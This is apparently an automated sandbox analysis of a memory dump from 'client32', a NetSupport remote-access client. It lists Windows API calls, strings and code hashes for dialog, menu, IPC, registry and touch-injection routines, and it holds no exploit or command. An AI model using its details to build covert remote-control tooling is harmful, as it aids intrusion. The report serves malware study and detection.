• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
• String ID: %s%s.htm$.%u$ApprovedWebList$Store\
• API String ID: 559337438-1872371932
APIs
• GetDlgItem.USER32(?,?), ref: 11025351
  • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
  • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
  • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
  • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
  • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
  • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
  • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
• SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
• SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
• SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
• SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
• String ID: 8
• API String ID: 762489935-4194326291
APIs
• GetMenuItemCount.USER32(?), ref: 1100521E
• _memset.LIBCMT ref: 11005240
• GetMenuItemID.USER32(?,00000000), ref: 11005254
• CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
• EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
• GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
• SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ItemMenu$Info$CheckCountEnable_memset
• String ID: 0
• API String ID: 2755257978-4108050209
APIs
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?,75730BD0,00000000,?,?,?,1113832B,Terminal Server), ref: 1113176C
• RegCloseKey.ADVAPI32(?,?,?,?,1113832B,Terminal Server), ref: 1113181D
  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
• LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
• lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
• lstrlenA.KERNEL32(00000000), ref: 111317ED
• LocalFree.KERNEL32(00000000), ref: 11131808
Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
                                                                                • String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
                                                                                • API String ID: 2999768849-588814233
                                                                                • Opcode ID: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                • Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
                                                                                • Opcode Fuzzy Hash: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                • Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 1101D750
                                                                                • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
                                                                                • _memset.LIBCMT ref: 1101D77A
                                                                                • RegisterClassExA.USER32(?), ref: 1101D7BB
                                                                                • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11195264,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D7EE
                                                                                • GetWindowRect.USER32(00000000,?), ref: 1101D7FB
                                                                                • DestroyWindow.USER32(00000000), ref: 1101D802
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                • String ID: NSMChatSizeWnd
                                                                                • API String ID: 2883038198-4119039562
                                                                                • Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                • Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
                                                                                • Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                • Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 110334CA
                                                                                • _memset.LIBCMT ref: 11033501
                                                                                • RegisterClipboardFormatA.USER32(?), ref: 11033529
                                                                                • GetLastError.KERNEL32 ref: 11033534
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • _memmove.LIBCMT ref: 1103357E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                                                • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                                                • API String ID: 2414640225-228067302
                                                                                • Opcode ID: 4806dd2360c89aae23173ee0d242eaa753ef1fe839067c9f549e94da566ade4d
                                                                                • Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
                                                                                • Opcode Fuzzy Hash: 4806dd2360c89aae23173ee0d242eaa753ef1fe839067c9f549e94da566ade4d
                                                                                • Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90
                                                                                APIs
                                                                                Strings
                                                                                • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                                • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                                • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                                • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                                • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Sleep
                                                                                • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                • API String ID: 4250438611-314227603
                                                                                • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                                • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                                APIs
                                                                                • _strncmp.LIBCMT ref: 1100953A
                                                                                • _strncmp.LIBCMT ref: 1100954A
                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,1B702977), ref: 110095EB
                                                                                Strings
                                                                                • IsA(), xrefs: 110095A5, 110095CD
                                                                                • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                • https://, xrefs: 1100952F
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                • http://, xrefs: 11009535, 11009548
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strncmp$FileWrite
                                                                                • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                • API String ID: 1635020204-3154135529
                                                                                • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                APIs
                                                                                • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                                • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
                                                                                • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                                • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                                • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                                • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 110274F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Item$ClassMessageNamePostTextWindow
                                                                                • String ID: #32770$Tapiexe
                                                                                • API String ID: 3170390011-3313516769
                                                                                • Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                                • Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                                APIs
                                                                                • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                  • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                                • GetDlgItem.USER32(?,?), ref: 11023414
                                                                                • SetFocus.USER32(00000000), ref: 11023417
                                                                                • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 1605826578-1986719024
                                                                                • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                                • _memset.LIBCMT ref: 1114515E
                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                                • CreatePopupMenu.USER32 ref: 111451AA
                                                                                • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                                • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                                • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
• String ID: 0
• API String ID: 74472576-4108050209
• Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
• Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
• Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
• Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
APIs
• GetParent.USER32(?), ref: 11039768
• GetDlgItem.USER32(00000000,00000001), ref: 11039771
• IsWindowEnabled.USER32(00000000), ref: 11039778
• PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
• GetParent.USER32(?), ref: 110397B6
• GetWindowRect.USER32(?,?), ref: 110397C3
• IntersectRect.USER32(?,?,?), ref: 110397FC
• GetWindowRect.USER32(00000000,?), ref: 11039836
• SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
• String ID:
• API String ID: 818519836-0
• Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
• Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
• Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
• Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50
APIs
• GetDC.USER32(00000000), ref: 11153763
• CreateCompatibleDC.GDI32(00000000), ref: 11153779
• SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
• CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
• SelectObject.GDI32(00000000,00000000), ref: 1115389B
• SelectObject.GDI32(00000000,?), ref: 111538C1
• SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
• DeleteDC.GDI32(00000000), ref: 111538D8
• ReleaseDC.USER32(00000000,?), ref: 111538E7
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
• String ID:
• API String ID: 602542589-0
• Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
• Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
• Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
• Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
APIs
  • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
  • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,76963760,00000000,111F1590,?,110CD955,00000000,76963760), ref: 111103E8
  • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD955,00000000,76963760), ref: 11110408
• EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
• SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
• SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
• LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
• IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
• LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
• DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
• LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
• LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
• String ID:
• API String ID: 1497311044-0
• Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
• Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
• Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
• Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
APIs
• GetStockObject.GDI32(00000003), ref: 111135A7
• FillRect.USER32(?,?,00000000), ref: 111135C4
• FillRect.USER32(?,?,00000000), ref: 111135D2
• SetROP2.GDI32(?,00000007), ref: 111135FE
• SetBkMode.GDI32(?,?), ref: 1111360A
• SetBkColor.GDI32(?,?), ref: 11113615
• SetTextColor.GDI32(?,?), ref: 11113620
• SetTextJustification.GDI32(?,?,?), ref: 11113631
• SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                • String ID:
                                                                                • API String ID: 1094208222-0
                                                                                • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
                                                                                • GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
                                                                                • GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
                                                                                • GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
                                                                                • GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
                                                                                • GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
                                                                                • GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
                                                                                • GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
                                                                                • GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID:
                                                                                • API String ID: 190572456-0
                                                                                • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                                • Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                                APIs
                                                                                • UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D98F
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9A9
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9B6
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9C3
                                                                                • SetEvent.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9D5
                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9DF
                                                                                • SetEvent.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9F1
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9FB
                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109DA08
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$Event$FileUnmapView
                                                                                • String ID:
                                                                                • API String ID: 2427653990-0
                                                                                • Opcode ID: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                                • Instruction ID: ef7400aadcbdc77f3d4b8b656ca31cdf014edcd8fc82e503e85a70b1789423f5
                                                                                • Opcode Fuzzy Hash: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                                • Instruction Fuzzy Hash: 7B11ECB1A407489BD730EFAAC9D481AFBF9AF583043514D7EE19AC3A10C634E8489B50
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • _memset.LIBCMT ref: 110433A9
                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsSystem$__wcstoi64_memset
                                                                                • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                                • API String ID: 3760389471-710950153
